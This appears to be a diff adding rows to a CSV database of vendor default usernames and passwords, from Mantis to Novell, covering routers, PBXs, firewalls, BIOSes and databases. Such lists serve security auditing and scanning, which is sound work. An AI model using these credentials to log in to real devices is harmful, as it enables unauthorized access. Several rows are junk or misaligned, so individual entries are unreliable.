+mantis,Mantis,,,administrator,root,Admin,, +manufactor,Product,,Access_Validated,User,Password,,, +marconi,Fore ATM Switches,,,ami,,,, +marconi,Fore ATM Switches,,Admin,ami,,,, +marconi,Fore ATM Switches,,Multi,ami,,Admin,, +maxdata,ms2137,,Multi,,,Admin,, +mcafee,3100,4.x, 5.x,local, ssh,root,root, +mcafee,IntruShield IPS Sensor,,,admin,admin123,,, +mcafee,IntruShield IPS Sensor,1.8,SSH,admin,admin123,,, +mcafee,IntruShield IPS Sensor,1.9,SSH,admin,admin123,,, +mcafee,IntruShield IPS Sensor,2.1,SSH,admin,admin123,,, +mcafee,IntruShield IPS Sensor,3.1,SSH,admin,admin123,,, +mcafee,IntruShield Manager,,,admin,admin123,,, +mcafee,IntruShield Manager,1.8,HTTP,admin,admin123,,, +mcafee,IntruShield Manager,1.9,HTTP,admin,admin123,,, +mcafee,IntruShield Manager,2.1,HTTP,admin,admin123,,, +mcafee,IntruShield Manager,3.1,HTTP,admin,admin123,,, +mcafee,SCM 3100,4.1,Multi,scmadmin,scmchangeme,Admin,, +mcafee,SCM 3200,,http,scmadmin,changeme,Admin,, +mcafee,e250,,,webshield,webshieldchangeme,,, +mcafee,e250,,HTTP,webshield,webshieldchangeme,,, +mcdata,FC Switches/Directors,,Multi,Administrator,password,Admin,, +mediatrix,2102,,http://x.x.x.x:8080,root,5678,,, +mediatrix2102,,,http://192.168.1.102,admin,1234,,, +mediatrix2102,mediatrix 2102,,HTTP,admin,1234,Admin,, +medion,Routers,,HTTP,,medion,Admin,, +megastar,BIOS,,Console,,star,Admin,, +megastar,PC BIOS,,,,star,,, +megastar,PC BIOS,,Admin,,star,,, +megastar,PC BIOS,,Console,,star,Admin,, +melco,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default, +memotec,CX Line,,Console,memotec,supervisor,,, +memotec,CX Line,Any,Multi,memotec,supervisor,Console,, +mentec,Micro/RSX,,,MICRO,RSX,,, +mentec,Micro/RSX,,,MICRO,RSX,Admin,, +mentec,Micro/RSX,,Admin,MICRO,RSX,,, +mentec,Micro/RSX,,Multi,MICRO,RSX,Admin,, +mercury interactive,Topaz Prism,,,admin,admin,,, +mercury,234234,,234234,Administrator,admin,,, +mercury,234234,,Admin,Administrator,admin,,, +mercury,234234,234234,SNMP,Administrator,admin,Admin,, +mercury,KT133A/686B,,,Administrator,admin,,, +mercury,KT133A/686B,,Admin,Administrator,admin,,, +mercury,KT133A/686B,,SNMP,Administrator,admin,Admin,, +mercury,Topaz Prism,,http,admin,admin,Admin,, +meridian,PBX,ANY,Telnet,service,smile,System,This is the default password on most Meridian systems., +metro,phone,,voicemail,client,client,,, +michiel,PHPList,2.6.4,http,admin,phplist,Admin,, +michiel,PHPlist,,2.6.4,admin,phplist,,, +micro soft,yahoo messenger,,,sherzad420,pakistan,,, +microcom,ADSL Routers,,,admin,epicrouter,Admin,, +microcom,ADSL Routers,,,user,password,Admin,, +microcom,Unknown,,,admin,superuser,,, +microcom,hdms,,,system,hdms,,unknown, +micron,PC BIOS,,,,sldkj754,,, +micron,PC BIOS,,,,xyzall,,, +micron,PC BIOS,,Admin,,sldkj754,,, +micron,PC BIOS,,Admin,,xyzall,,, +micron,PC BIOS,,Console,,sldkj754,Admin,, +micron,PC BIOS,,Console,,xyzall,Admin,, +micronet,3351 / 3354,,Multi,admin,epicrouter,Admin,, +micronet,Access Point,,Admin,root,default,,, +micronet,Access Point,,SP912,root,default,,, +micronet,SP3356,,,admin,epicrouter,,, +micronet,SP3356,,HTTP,admin,epicrouter,,, +micronet,SP3357,,HTTP,admin,epicrouter,admin,, +micronet,SP3357,,admin,admin,epicrouter,,, +micronet,SP5002,,Console,mac,,Admin,, +micronet,SP912 Access Point,,Telnet,root,default,Admin,, +micronet,SP916BM Wireless Broadband Router,,http,admin,admin,Admin,, +micronet,SP916GK,V2,HTTP,admin,,Admin,, +micronet,Wireless Broadband Router,,SP916BM,admin,admin,,, +micronics,PC BIOS,,,,dn_04rjc,,, +micronics,PC BIOS,,Admin,,dn_04rjc,,, +micronics,PC BIOS,,Console,,dn_04rjc,Admin,, +microplex,Print Server,,,root,root,,, +microplex,Print Server,,Admin,root,root,,, +microplex,Print Server,,Telnet,root,root,Admin,, +microrouter,900i,,,,letmein,,, +microrouter,900i,,Admin,,letmein,,, +microrouter,900i,,Console/Multi,,letmein,Admin,, +microsoft,200 server,,,,,,, +microsoft,Great Plains,,,LessonUser1,,,, +microsoft,Great Plains,,,LessonUser2,,,, +microsoft,Great Plains,All,Multi,LessonUser1,,,, +microsoft,Great Plains,All,Multi,LessonUser2,,,, +microsoft,MN-100,,http://192.168.2.1,,admin,Administration,, +microsoft,MN-500,,http://192.168.2.1,,admin,Administration,, +microsoft,MN-700,,http://192.168.2.1,,admin,Administration,, +microsoft,MN500 Base Station,,,,admin,Admin,, +microsoft,MN700 Wireless AP/Router,,,MSHOME,MSHOME,,, +microsoft,NT,,,,start,,, +microsoft,NT,,,free user,user,,4, +microsoft,SQL Server 2000,,SP3,sa,,,, +microsoft,SQL Server,,,,sa,,, +microsoft,SQL Server,,7,sa,,,, +microsoft,SQL Server,,Admin,sa,,,, +microsoft,SQL Server,7,Multi,sa,,Admin,, +microsoft,SiteServer,,3.x,LDAP_Anonymous,LdapPassword_1,,, +microsoft,SiteServer,3.x,http,LDAP_Anonymous,LdapPassword_1,,, +microsoft,Windows NT,,,,,,, +microsoft,Windows NT,,,Administrator,,,, +microsoft,Windows NT,,,Administrator,,,All, +microsoft,Windows NT,,,Administrator,Administrator,,, +microsoft,Windows NT,,,Guest,,,All, +microsoft,Windows NT,,,Guest,Guest,,, +microsoft,Windows NT,,,IS_$hostname,(same),,, +microsoft,Windows NT,,,Mail,,,All, +microsoft,Windows NT,,,User,User,,, +microsoft,Windows NT,,,pkoolt,pkooltPS,,4, +microsoft,Windows NT,,Admin,Administrator,,,, +microsoft,Windows NT,,Admin,Administrator,Administrator,,, +microsoft,Windows NT,,Multi,Administrator,,Admin,, +microsoft,Windows NT,,Multi,Administrator,Administrator,Admin,, +microsoft,Windows NT,,Multi,Guest,,User,, +microsoft,Windows NT,,Multi,Guest,Guest,User,, +microsoft,Windows NT,,Multi,IS_$hostname,(same),User,hostname is your servername, +microsoft,Windows NT,,Multi,User,User,User,, +microsoft,Windows NT,,User,Guest,,,, +microsoft,Windows NT,,User,Guest,Guest,,, +microsoft,Windows NT,,User,IS_$hostname,(same),,, +microsoft,Windows NT,,User,User,User,,, +microsoft,Windows Storage Server 2008,,,Administrator,wSS2008!,,, +mike peters,BasiliX,,1.1.1,bsxuser,bsxpass,,, +mikepeters,BasiliX,1.1.1,sql,bsxuser,bsxpass,Admin,, +mikrotik,,2.27,,admin,,172.16.11.1,, +mikrotik,,2.9.27,,admin,admin,,, +mikrotik,,2.9.27,http://10.0.0.138,admin,,,, +mikrotik,,3.20,192.168.2.2,admin,0111313071,,MikroTik, +mikrotik,,MikroTik v3.25,telnet,admin,admin,root,hello, +mikrotik,MKE-3.28, 3.28 ,http://189.150.32.11/,admin,admin,root,, +mikrotik,MicroTik,2.9.27,,admin,123,,, +mikrotik,Mikrotik,2.95,,multilink,,,, +mikrotik,Mikrotik2.9.42 windows xp,2.9.42,,admin,admin,admin,, +mikrotik,Router OS,2.9.17,HTTP,admin,,Admin,, +mikrotik,Router OS,all,Telnet,admin,,Admin,also for SSH and Web access, +mikrotik,Windows XP,3.2,10.15.113.1,admin,admin,,, +mikrotik,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,admin,admin,admin,admin, +mikrotik,wbr-2310,1.0,192.168.7.103,admin,,admin,, +mikrotik,webbox,2.9.6,bounce,admin,admin,bounce,12345, +mikrotik,windows xp,2.9.27,192.168.0.5,admin,18022011,root,, +mikrotik,windows xp,2.9.34,http://10.1.11.1,admin,admin,Admin,, +mikrotik,windows xp,webbox 2.9.27 login,192.168.2.1,admin,admin,root,, +milan,mil-sm801p,,Multi,root,root,Admin,, +minoltaqms,Magicolor 3100,3.0.0,HTTP,admin,,Admin,Gives access to Accounting, +minoltaqms,Magicolor 3100,3.0.0,HTTP,operator,,Admin,, +mintel,Mintel PBX,,,,SYSTEM,,, +mintel,Mintel PBX,,,,SYSTEM,Admin,, +mintel,Mintel PBX,,Admin,,SYSTEM,,, +mitel,3300 ICP,all,HTTP,system,password,Admin,, +mitel,MN3100ICP,,,system,mnet,,, +mitel,MN3100ICP,,HTTP,system,mnet,,, +mitel,SX200,All,Maint Port/attendant console,installer,1000,unlimited,This access controlls all other levels, +mitel,SX2000,all,Multi,,,Admin,, +mitel,sx2000,light,console,system,sx2000,Full installer,, +mklencke,Forumtalk,1.0rc2,,root,blablabla,Admin,, +mobotix,M10,,192.168.x.x,admin,meinsm,,, +mobotix,M10,,HTTP,admin,meinsm,192.168.x.x,, +mobotix,MOBOTIX M12,,http,admin,meinsm,http,, +mobotix,Windows XP,all versions,http://192.168.0.1,,ronda_atocha,guest,, +mobotix,abosalem,1,aaa,abosalem,1407,,, +motive,Chorus,,,admin,isee,Admin,, +motorola,Cablerouter,,,cablecom,router,,, +motorola,Cablerouter,,Admin,cablecom,router,,, +motorola,Cablerouter,,Telnet,cablecom,router,Admin,, +motorola,DPC-550 cell phone,,keypad,,000000000000,unlocks the phone,, +motorola,DPC-550 cell phone,,keypad,,123456123456,unlocks the phone,, +motorola,Motorola Cablerouter,,,cablecom,router,Admin,, +motorola,SB5120,,http://192.168.100.1,,,Administration,, +motorola,SBG900,,HTTP,admin,motorola,Admin,, +motorola,Various,,,service,smile,,, +motorola,Various,,,setup,,,, +motorola,WR850G Router,,,admin,password,,, +motorola,WR850G,4.03,HTTP,admin,motorola,Admin,higher revisions likely the same, +motorola,WR850R,,HTTP,admin,motorola,,, +motorola,Wireless Router,WR850G,HTTP,admin,motorola,Admin,, +motorola,vanguard,,Multi,,,Admin,, +motorola,wr850r,,,admin,motorola,,, +mp3mystic,MP3Mystic,,,admin,mp3mystic,,, +mp3mystic,MP3Mystic,,http,admin,mp3mystic,Admin,, +mro software,maximo,,Admin,SYSADM,sysadm,,, +mro software,maximo,,v4.1,SYSADM,sysadm,,, +mrosoftware,maximo,v4.1,Multi,SYSADM,sysadm,Admin,, +mrv,3312-4c,,Multi,admin,admin,all,, +mrv,3312-4c,,all,admin,admin,,, +mtechnology,PC BIOS,,Console,,mMmM,Admin,, +multitech,RASExpress Server,,,guest,,,5.30a, +mutare software,EVM Admin,,All,,admin,,, +mutaresoftware,EVM Admin,All,HTTP,,admin,Admin,, +muze,Ariadne,,2.2.1,admin,muze,,, +muze,Ariadne,2.2.1,http,admin,muze,Admin,, +my test,1.0,,You,Loser,1234,,, +mysql,Eventum,,,admin@example.com,admin,,, +mysql,Eventum,,http,admin@example.com,admin,Admin,, +mysql,MySQL,,,root,,,, +mysql,MySQL,all,,root,,Admin,, +nai,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin, : must be changed at 1st connection, +nai,Intrushield IPS,1200/2600/4000,SSH + Web console,admin,admin123,Admin,, +nanoteq,NetSeq firewall,,,admin,NetSeq,,*, +nanoteq,NetSeq,,,admin,NetSeq,,, +ncr,NCR UNIX,,,ncrm,ncrm,,, +ncr,NCR UNIX,,Admin,ncrm,ncrm,,, +ncr,NCR UNIX,,Multi,ncrm,ncrm,Admin,, +nec,WARPSTAR-BaseStation,,Telnet,,,Admin,, +netapp,NetCache,,,admin,NetCache,,any, +netapp,SANscreen,5.1.3,http,admin,admin123,Admin,, +netbotz,Netbotz Appliances,,,netbotz,netbotz,,, +netcomm,NB1300+4,,,admin,password,,, +netcomm,NB1300+4,all,Multi,admin,password,,, +netcomm,NB1300,,,admin,password,,, +netcomm,NB1300,all,Multi,admin,password,,, +netcomm,NB5580 / NB5580W,,,,admin,Admin,Any user name (or blank) is valid with this password, +netcordia,NetMRI,,http,admin,admin,Admin,, +netgear fr314,Firewall router,,,admin,password,,, +netgear fr314,Firewall router,,Admin,admin,password,,, +netgear,802.11b Wireless Cable/DSL router,,MR814,admin,password,,, +netgear,CG814GCMR,,http://192.168.0.1,admin,password,admin,charter communications, +netgear,CG814WG,v2,192.168.0.1,comcast,1234,setup,, +netgear,Cable/DSL Router,,RT-314,admin,1234,,, +netgear,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics page,192.168.0.1/docsisdevicestatus.html, +netgear,DG632 ADSL Modem,V3.3.0a_cx,HTTP,admin,password,Admin,, +netgear,DG632,,http://192.168.0.1,admin,password,Administration,, +netgear,DG814 Router,,,admin,password,Admin,, +netgear,DG824G,,,admin,password,Admin,, +netgear,DG824M,,,admin,password,Admin,, +netgear,DG834,,http://192.168.0.1,admin,password,Administration,, +netgear,DG834G,,,,admin,Admin,, +netgear,DG834G,,,,zebra,,, +netgear,DG834G,,http://192.168.0.1,admin,password,Administration,, +netgear,DG834G,,telnet,,zebra,Admin,, +netgear,DG834GT,V1.03.87,http://192.168.0.1,,,root,, +netgear,DG934G,,,admin,sky,admin,, +netgear,DM602,,FTP Telnet and HTTP,admin,password,Admin,, +netgear,FM114P,,Multi,,,Admin,, +netgear,FR114P,,HTTP,admin,password,Admin,, +netgear,FR314,,HTTP,admin,password,Admin,, +netgear,FVS318,,HTTP,admin,password,Admin,, +netgear,FVS338,,HTTP,admin,password,Admin,, +netgear,FWG114P,,Multi,,admin,password,, +netgear,GS724t,V1.0.1_1104,HTTP,,password,Admin,, +netgear,GSM7224,,HTTP,admin,,Admin,, +netgear,ME102 ,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5, +netgear,MR-314,,3.26,admin,1234,,, +netgear,MR-314,,Admin,admin,1234,,, +netgear,MR-314,3.26,HTTP,admin,1234,Admin,, +netgear,MR314,,Multi,admin,1234,Admin,, +netgear,MR814,,HTTP,admin,password,Admin,, +netgear,RM356,,Admin,,1234,,, +netgear,RM356,,None,,1234,,, +netgear,RM356,None,Telnet,,1234,Admin,shutdown the router via internet, +netgear,RP114,,,admin,1234,,, +netgear,RP114,,3.26,,1234,,, +netgear,RP114,,Admin,admin,1234,,, +netgear,RP114,,Multi,admin,1234,admin,, +netgear,RP114,,Telnet,admin,1234,Admin,, +netgear,RP114,,admin,admin,1234,,, +netgear,RP114,3.20-3.26,HTTP,admin,1234,Admin,default http://192.168.0.1, +netgear,RP114,3.26,Telnet,,1234,Admin,telnet 192.168.0.1, +netgear,RP614,,,admin,password,,, +netgear,RP614,,Admin,admin,password,,, +netgear,RP614,,HTTP,admin,password,Admin,, +netgear,RT-311,,Admin,Admin,1234,,, +netgear,RT-311,,HTTP,Admin,1234,Admin,, +netgear,RT311,,,Admin,1234,,Any, +netgear,RT311/RT314,,,admin,1234,,, +netgear,RT314,,,admin,admin,,, +netgear,RT314,,Admin,admin,1234,,, +netgear,RT314,,Admin,admin,admin,,, +netgear,RT314,,HTTP and Telnet,admin,1234,Admin,, +netgear,RT314,,HTTP,admin,admin,Admin,, +netgear,Router,,DG814,admin,password,,, +netgear,Router/Modem,,Multi,admin,password,Admin,, +netgear,WAP54G,,,,admin,Admin,, +netgear,WG302,,,admin,password,,, +netgear,WG302,,HTTP,admin,password,,, +netgear,WG602 Router,2,,admin,password,,, +netgear,WG602,,Firmware Version 1.04.0,super,5777364,,, +netgear,WG602,,Firmware Version 1.5.67,super,5777364,,, +netgear,WG602,,Firmware Version 1.7.14,superman,21241036,,, +netgear,WG602,Firmware Version 1.04.0,HTTP,super,5777364,Admin,, +netgear,WG602,Firmware Version 1.5.67,HTTP,super,5777364,Admin,, +netgear,WG602,Firmware Version 1.7.14,HTTP,superman,21241036,Admin,, +netgear,WGE101,,,admin,password,Admin,, +netgear,WGR-614,,admin,admin,password,,, +netgear,WGR101 Router,,,admin,password,,, +netgear,WGR614 Router,v4,,admin,setup,Admin,, +netgear,WGR614,v5,http://192.168.0.1 or http://routerlogin.net/,admin,password,Administration,, +netgear,WGR624 Router,,,admin,password,,, +netgear,WGT624,,http://192.168.0.1,admin,password,Administration,, +netgear,WGT634U,,HTTP,admin,password,Admin,, +netgear,wpn824,,,edel,1234567,,, +netgeatr,RP114,,3.20-3.26,admin,1234,,, +netgenesis,NetAnalysis Web Reporting,,,naadmin,naadmin,,, +netgenesis,NetAnalysis Web Reporting,,Admin,naadmin,naadmin,,, +netgenesis,NetAnalysis Web Reporting,,HTTP,naadmin,naadmin,Admin,, +netopia,3351,,Multi,,,Admin,, +netopia,4542,,Multi,admin,noway,Admin,, +netopia,Caiman 3200,3200,http://192.168.1.1,admin,1234,,, +netopia,Netopia 7100,,,,,,, +netopia,Netopia 7100,,Admin,,,,, +netopia,Netopia 7100,,Telnet,,,Admin,, +netopia,Netopia 9500,,,netopia,netopia,,, +netopia,Netopia 9500,,Admin,netopia,netopia,,, +netopia,Netopia 9500,,Telnet,netopia,netopia,Admin,, +netopia,R7100,,,admin,admin,,4.6.2, +netopia,R910,,Multi,admin,,Admin,, +netport,Express 10/100,,,setup,setup,,, +netport,Express 10/100,,Admin,setup,setup,,, +netport,Express 10/100,,multi,setup,setup,Admin,, +netscape,Enterprise Server,,http,admin,admin,Admin,, +netscape,Netscape Enterprise Server,,,admin,admin,,, +netscreen,Firewall,,,netscreen,netscreen,,, +netscreen,Firewall,,Admin,netscreen,netscreen,,, +netscreen,Firewall,,multi,netscreen,netscreen,Admin,, +netscreen,IDP,,2.0p1,admin,netscreen,,, +netscreen,IDP,2.0p1,,admin,netscreen,Admin,, +netscreen,NS-5 NS10 NS-100,,,netscreen,netscreen,,, +netscreen,Netscreen,,,netscreen,netscreen,,, +netscreen,all firewalls,,all,netscreen,netscreen,,, +netscreen,firewall,,HTTP,Administrator,,Admin,, +netscreen,firewall,,Telnet,Administrator,,Admin,, +netscreen,firewall,,Telnet,admin,,Admin,, +netscreen,firewall,,Telnet,operator,,Admin,, +netscreen,ns-25,,,,,,, +netscreen,ns-25,,Admin,,,,, +netscreen,ns-25,,Multi,,,Admin,, +netstar,Netpilot,,Multi,admin,password,Admin,, +network appliance,NetCache,,Admin,admin,NetCache,,, +network appliance,NetCache,,any,admin,NetCache,,, +network associates,WebShield Security Appliance e250,,,e250,e250changeme,,, +network associates,WebShield Security Appliance e250,,Admin,e250,e250changeme,,, +network associates,WebShield Security Appliance e500,,,e500,e500changeme,,, +network associates,WebShield Security Appliance e500,,Admin,e500,e500changeme,,, +networkappliance,NetCache,any,Multi,admin,NetCache,Admin,, +networkassociates,WebShield Security Appliance e250,,HTTP,e250,e250changeme,Admin,, +networkassociates,WebShield Security Appliance e500,,HTTP,e500,e500changeme,Admin,, +networkeverywhere,NWR11B,,HTTP,,admin,Admin,, +networkice,ICECap Manager,,2.0.22 <,iceman,,,, +networkice,ICECap Manager,below 2.0.22,port 8081,iceman,,Admin,, +newbridge,Congo/Amazon/Tigris,,,netman,netman,,All versions, +nexland,ISB SOHO,,http://192.168.0.1,admin,,Administration,, +nexland,ISB2LAN,,http://192.168.0.1,user:,,Administration,, +nexland,Pro100,,http://192.168.0.1,user:,,Administration,, +nexland,Pro400,,http://192.168.0.1,user:,,Administration,, +nexland,Pro800 Turbo,,http://192.168.0.1,admin,,Administration,, +nexsan,ATABoy2F,8.10f,http,ADMIN,PASSWORD,Admin,, +next,NeXTStep,,,me,,,, +next,NeXTStep,,,root,NeXT,,, +next,NeXTStep,,,signa,signa,,, +next,NeXTStep,,Admin,root,NeXT,,, +next,NeXTStep,,Multi,me,,User,, +next,NeXTStep,,Multi,root,NeXT,Admin,, +next,NeXTStep,,Multi,signa,signa,User,, +next,NeXTStep,,User,me,,,, +next,NeXTStep,,User,signa,signa,,, +ngsec,NGSecureWeb,,HTTP,admin,,Admin,, +ngsec,NGSecureWeb,,HTTP,admin,asd,Admin,, +ngsecure,The Hooy,,1,admin,admin,,, +ngsecure,The Hooy,,Admin,admin,admin,,, +nicesystemsltd,NICELog,,,Administrator,nicecti,Admin,, +nicesystemsltd,NICELog,,,Nice-admin,nicecti,Admin,, +niksun,NetDetector,,Multi,vcr,NetVCR,Admin,su after login with empty password, +nimble,BIOS,,Console,,xdfk9874t3,Admin,, +nimble,PC BIOS,,,,xdfk9874t3,,, +nimble,PC BIOS,,Admin,,xdfk9874t3,,, +nimble,PC BIOS,,Console,,xdfk9874t3,Admin,, +nixdorf,Siemens Nixdorf PC BIOS,,Console,,SKY_FOX,Admin,, +no,no,,microsoft,9000,1234567890,,, +nokia,7360,,Multi,,9999,Admin,, +nokia,770,,,root,rootme,Admin,, +nokia,DSL Router M1122,,1.1 - 1.2,m1122,m1122,,, +nokia,DSL Router M1122,,Administrator,Telecom,Telecom,,, +nokia,DSL Router M1122,,Multi,Telecom,Telecom,Administrator,, +nokia,DSL Router M1122,,User,m1122,m1122,,, +nokia,DSL Router M1122,1.1 - 1.2,Multi,m1122,m1122,User,, +nokia,M10,,,Telecom,Telecom,,, +nokia,MW1122,,Multi,telecom,telecom,Admin,Only in New Zealand., +nokia,all mobiles,,Security Code,nop,12345,,, +nokia,all mobiles,nop,Multi,nop,12345,Security Code,, +nokia,most Nokia cell phones,all,except some of newest models,*3001#12345#,,, can be reset., +nokia,n800,all,ssh (remote or localhost),root,rootme,root user,by default ssh not installed, +nokia,nokia,,,root,nokia,,, +nokia,nokia,,security code,nop,123454,,, +nokia,phone,,voicemail,client,client,,, +norstar,Meridian KSU,,Admin,**23646,23646,,, +norstar,Meridian KSU,,Config,**266344,266344,,, +nortel,Accelar (Passport) 1000 series routing switches,,,l2,l2,,, +nortel,Accelar (Passport) 1000 series routing switches,,,l3,l3,,, +nortel,Accelar (Passport) 1000 series routing switches,,,ro,ro,,, +nortel,Accelar (Passport) 1000 series routing switches,,,rw,rw,,, +nortel,Accelar (Passport) 1000 series routing switches,,,rwa,rwa,,, +nortel,Accelar (Passport) 1000 series routing switches,,Layer 2 Read Write,l2,l2,,, +nortel,Accelar (Passport) 1000 series routing switches,,Layer 3 (and layer 2) Read Write,l3,l3,,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,l2,l2,Layer 2 Read Write,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,l3,l3,Layer 3 (and layer 2) Read Write,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,ro,ro,Read Only,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,rw,rw,Read Write,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,rwa,rwa,Read Write All,, +nortel,Accelar (Passport) 1000 series routing switches,,Read Only,ro,ro,,, +nortel,Accelar (Passport) 1000 series routing switches,,Read Write All,rwa,rwa,,, +nortel,Accelar (Passport) 1000 series routing switches,,Read Write,rw,rw,,, +nortel,BCM,,3.5 - 3-7,administrator,PlsChgMe!,,, +nortel,BCM,,3.5 - 3-7,supervisor,visor,,, +nortel,BayStack,,310/303,,secure,,, +nortel,Baystack 350-24T,,,,secure,,, +nortel,Baystack 350-24T,,Admin,,secure,,, +nortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RO,user,Read Only,, +nortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RW,secure,Admin,, +nortel,Baystack,310/303,,,,Admin,, +nortel,Baystack,310/303,,,secure,Admin,, +nortel,Baystack,350-24T,Telnet,,secure,Admin,, +nortel,Business Communications Manager,3.5 and 3.6,https,supervisor,PlsChgMe!,Admin,Note exclamation in password, +nortel,Business Communications Manager,3.5-3.7,,administrator,PlsChgMe!,Admin,Note exclamation in password, +nortel,Business Communications Manager,3.5-3.7,,supervisor,visor,Admin,, +nortel,Contivity Extranet Switches,2.x,,admin,setup,,, +nortel,Contivity Switch,,,admin,setup,,, +nortel,Contivity,,Admin,admin,setup,,, +nortel,Contivity,,Extranet/VPN switches,admin,setup,,, +nortel,Contivity,Extranet/VPN switches,HTTP,admin,setup,Admin,, +nortel,Extranet Switches,,,admin,setup,,, +nortel,Extranet Switches,,Admin,admin,setup,,, +nortel,Extranet Switches,,Multi,admin,setup,Admin,, +nortel,MIPCD,1.04,,user,,Admin,, +nortel,MIPCD,1.04,FTP,user,user,r/w,, +nortel,MIPCD,1.04,http,admin,admin,Admin,, +nortel,MIPCD,1.5,,,,,, +nortel,MIPCD,1.5,,user,,Admin,, +nortel,MIPCD,1.5,,user,user,,, +nortel,MIRAN,,,distrib,distrib0,Admin,, +nortel,MIRAN,,,user,user0000,Admin,, +nortel,MIRAN,3.xx,serial,admin,admin000,Admin,, +nortel,Matra 6501 PBX,,,,0,,, +nortel,Matra 6501 PBX,,Admin,,0000,,, +nortel,Matra 6501 PBX,,Console,,0,Admin,, +nortel,Matra 6501 PBX,,Console,,0000,Admin,, +nortel,Meridian 1 PBX,,,0,0,,OS Release 2, +nortel,Meridian CCR,,,ccrusr,ccrusr,,, +nortel,Meridian CCR,,,disttech,4tas,,, +nortel,Meridian CCR,,,maint,maint,,, +nortel,Meridian CCR,,,service,smile,,, +nortel,Meridian CCR,,Maintenance account,maint,maint,,, +nortel,Meridian CCR,,Multi,disttech,4tas,engineer account,, +nortel,Meridian CCR,,Multi,disttech,etas,engineer account,, +nortel,Meridian CCR,,Multi,maint,maint,Maintenance account,, +nortel,Meridian CCR,,Multi,service,smile,general engineer account,, +nortel,Meridian CCR,,User account,ccrusr,ccrusr,,, +nortel,Meridian CCR,,engineer account,disttech,4tas,,, +nortel,Meridian CCR,,general engineer account,service,smile,,, +nortel,Meridian CCR,,telnet/modem,ccrusr,ccrusr,User account,, +nortel,Meridian CCR,,telnet/modem,mlusr,mlusr,user account,, +nortel,Meridian CCR,,telnet/modem,trmcnfg,trmcnfg,,, +nortel,Meridian KSU,,Console,**23646,23646,Admin,, +nortel,Meridian KSU,,Console,**266344,266344,Config,, +nortel,Meridian Link,,,disttech,4tas,,, +nortel,Meridian Link,,,maint,maint,,, +nortel,Meridian Link,,,mlusr,mlusr,,, +nortel,Meridian Link,,,service,smile,,, +nortel,Meridian Link,,Maintenance account,maint,maint,,, +nortel,Meridian Link,,Multi,disttech,4tas,engineer account,, +nortel,Meridian Link,,Multi,disttech,etas,engineer account,, +nortel,Meridian Link,,Multi,maint,maint,Maintenance account,, +nortel,Meridian Link,,Multi,service,smile,general engineer account,, +nortel,Meridian Link,,engineer account,disttech,4tas,,, +nortel,Meridian Link,,general engineer account,service,smile,,, +nortel,Meridian Link,,telnet/modem,ccrusr,ccrusr,User account,, +nortel,Meridian Link,,telnet/modem,mlusr,mlusr,user account,, +nortel,Meridian Link,,telnet/modem,trmcnfg,trmcnfg,,, +nortel,Meridian Link,,user account,mlusr,mlusr,,, +nortel,Meridian Link/CCR/Max,,,ccrusr,ccrusr,,, +nortel,Meridian Link/CCR/Max,,,disttech,4tas,,, +nortel,Meridian Link/CCR/Max,,,disttech,disttech,,, +nortel,Meridian Link/CCR/Max,,,maint,maint,,, +nortel,Meridian Link/CCR/Max,,,mlusr,mlusr,,, +nortel,Meridian Link/CCR/Max,,,service,smile,,, +nortel,Meridian Link/CCR/Max,,,trmcnfg,trmcnfg,,, +nortel,Meridian MAX,,,maint,ntacdmax,,, +nortel,Meridian MAX,,,root,3ep5w2u,,, +nortel,Meridian MAX,,,service,smile,,, +nortel,Meridian MAX,,Admin,root,3ep5w2u,,, +nortel,Meridian MAX,,Maintenance account,maint,ntacdmax,,, +nortel,Meridian MAX,,general engineer account,service,smile,,, +nortel,Meridian Mail,10.xx,AX in serial,admin,admin,Admin,, +nortel,Meridian Mail,13.xx,AX in serial,system,adminpwd,Admin,, +nortel,Meridian Max,,Multi,maint,maint,Maintenance account,, +nortel,Meridian Max,,Multi,maint,ntacdmax,Maintenance account,, +nortel,Meridian Max,,Multi,root,3ep5w2u,Admin,, +nortel,Meridian Max,,Multi,service,smile,general engineer account,, +nortel,Meridian Max,,telnet/modem,disttech,4tas,,, +nortel,Meridian Max,,telnet/modem,disttech,etas,,, +nortel,Meridian Max,,telnet/modem,mlusr,mlusr,user account,, +nortel,Meridian Max,,telnet/modem,trmcnfg,trmcnfg,,, +nortel,Meridian Max,,telnet/moden,ccrusr,ccrusr,User account,, +nortel,Meridian PBX,,,login,0,,, +nortel,Meridian PBX,,,login,0000,,, +nortel,Meridian PBX,,,login,1111,,, +nortel,Meridian PBX,,,login,8429,,, +nortel,Meridian PBX,,,spcl,0,,, +nortel,Meridian PBX,,,spcl,0000,,, +nortel,Meridian PBX,,Serial,login,0,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,login,0000,,, +nortel,Meridian PBX,,Serial,login,1111,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,login,8429,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,spcl,0,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,spcl,0000,,, +nortel,Meridian,,,,,,, +nortel,Meridian,,Admin,,,,, +nortel,Meridian,,Multi,,,Admin,, +nortel,Millennium,,keypad while hung up,,2727378,Maintenance,, +nortel,Norstar Modular ICS,,,**ADMIN (**23646),ADMIN (23646),,Any, +nortel,Norstar Modular ICS,,,**CONFIG (266344),CONFIG (266344),,Any, +nortel,Norstar,,Console,266344,266344,Admin,, +nortel,Phone System,All,From Phone,,266344,Installers,, +nortel,Remote Office 9150,,,admin,root,,, +nortel,Remote Office 9150,,Admin,admin,root,,, +nortel,Remote Office 9150,,Client,admin,root,Admin,, +nortel,Shasta,,,admin,admin,,any, +nortel,Symposium,,,sysadmin,nortel,,, +nortel,Symposium,,,sysadmin,nortel,Admin,, +nortel,dms,,Multi,,,Admin,, +nortel,p8600,,Multi,,,Admin,, +novell,Groupwise 5.5 Enhancement Pack,,,servlet,manager,,, +novell,Groupwise 6.0,,,servlet,manager,,, +novell,Groupwise,,5.5 Enhancement Pack,servlet,manager,,, +novell,Groupwise,,6,servlet,manager,,, 